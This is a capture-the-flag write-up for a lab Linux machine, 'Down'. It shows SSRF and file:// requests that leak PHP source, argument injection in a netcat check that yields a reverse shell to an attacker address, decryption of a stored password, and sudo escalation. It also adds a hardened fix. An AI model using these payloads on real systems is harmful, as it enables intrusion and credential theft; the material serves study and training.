Machine - Down
Writeup Author: bobbuilder
Overview
Category: Machine
Difficulty: Easy Linux
Domain: down.vl
Objective: The machine exposes a web interface vulnerable to command injection, which allows initial access. User credentials are later extracted from a local encrypted password manager file. Root access is obtained via full sudo rights.
Enumeration
Nmap Scan
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
- HTTP Title: Is it down or just me?
- Interesting file path discovered through testing: /index.php?expertmode=tcp enables raw IP/port-based netcat checks.
Initial Access
Identify Potential LFI and SSRF
Attempt SSRF via POST:
POST /index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
url=http%3A%2F%2F127.0.0.1%2Fserver-status
Test for local file access by appending a second, file:// URL to the same parameter; the response includes the source of index.php:
POST /index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
url=http://127.0.0.1/ file:///var/www/html/index.php
Snippet from index.php
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' && isset($_POST['ip']) && isset($_POST['port']) ) {
    $ip = trim($_POST['ip']);
    $valid_ip = filter_var($ip, FILTER_VALIDATE_IP);
    $port = trim($_POST['port']);
    $port_int = intval($port);                                  // "1234 -e /bin/sh" becomes 1234
    $valid_port = filter_var($port_int, FILTER_VALIDATE_INT);   // validates the integer, not the raw string
    if ( $valid_ip && $valid_port ) {
        $rc = 255; $output = '';
        $ec = escapeshellcmd("/usr/bin/nc -vz $ip $port");      // raw $port is interpolated, not $port_int
        // ... (command execution follows; snippet truncated)
The POST handler for expertmode=tcp validates intval($port) but interpolates the raw $port string into the command. escapeshellcmd() neutralises shell metacharacters but leaves whitespace untouched, so extra arguments can be appended to:
/usr/bin/nc -vz $ip $port
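As an added example (not the machine's own index.php), the same check hardened so that the validated values, not the raw strings, reach nc and each one is passed as exactly one argument; it assumes the same ip and port POST parameters and the same nc -vz probe:

```php
<?php
// Added example, not the machine's code: hardened version of the expertmode=tcp handler.
// Assumes the same POST parameters (ip, port) and the same /usr/bin/nc -vz check.

function tcp_check(string $ip, string $port): array {
    $valid_ip = filter_var(trim($ip), FILTER_VALIDATE_IP);

    // Validate the raw *string* as an integer in the TCP port range.
    // intval("1234 -e /bin/sh") returns 1234 and would pass FILTER_VALIDATE_INT,
    // which is exactly the gap in the original handler.
    $valid_port = filter_var(trim($port), FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 65535]]);

    if ($valid_ip === false || $valid_port === false) {
        return ['rc' => 255, 'output' => 'invalid ip or port'];
    }

    // Only the validated values are used, and escapeshellarg() single-quotes each
    // one so it cannot be split into additional nc arguments. escapeshellcmd()
    // alone would still let whitespace through.
    $cmd = '/usr/bin/nc -vz '
         . escapeshellarg($valid_ip) . ' '
         . escapeshellarg((string) $valid_port) . ' 2>&1';

    $lines = [];
    $rc = 255;
    exec($cmd, $lines, $rc);
    return ['rc' => $rc, 'output' => implode("\n", $lines)];
}

if (isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp'
    && isset($_POST['ip']) && isset($_POST['port'])) {
    $result = tcp_check($_POST['ip'], $_POST['port']);
    header('Content-Type: text/plain');
    echo "rc={$result['rc']}\n{$result['output']}\n";
}
```

With this version a port value such as "1234 -e /bin/sh" is rejected before any command is built, and even a value that passes validation is delivered to nc as a single argument.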
Exploit: Reverse Shell via Netcat
Start listener:
nc -lvvp 1234
Trigger reverse shell:
POST /index.php?expertmode=tcp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
ip=<attacker_ip>&port=1234+-e+/bin/sh
Successful connection:
connect to [me] from (UNKNOWN) [<down_ip>] 37804
Read user flag:
cat user_<REDACTED>.txt
Post-Exploitation
1. Discover Sensitive Files
Run linpeas.sh and look for interesting files:
/home/aleks/.local/share/pswm/pswm
Contents:
<Base64 Encrypted PSWM content>
User Privilege Escalation
1. Decrypt Stored Credentials
Use the following decoder:
- https://github.com/repo4Chu/pswm-decoder
Run decoder:
python3 exploit.py
Output:
pswm aleks flower
Use the password to switch user:
ssh aleks@<down_ip>
# or if already in shell:
su aleks
Root Privilege Escalation
1. Check sudo permissions
sudo -l
Output:
(ALL : ALL) ALL
2. Become root
sudo su
Read root flag:
cat /root/root.txt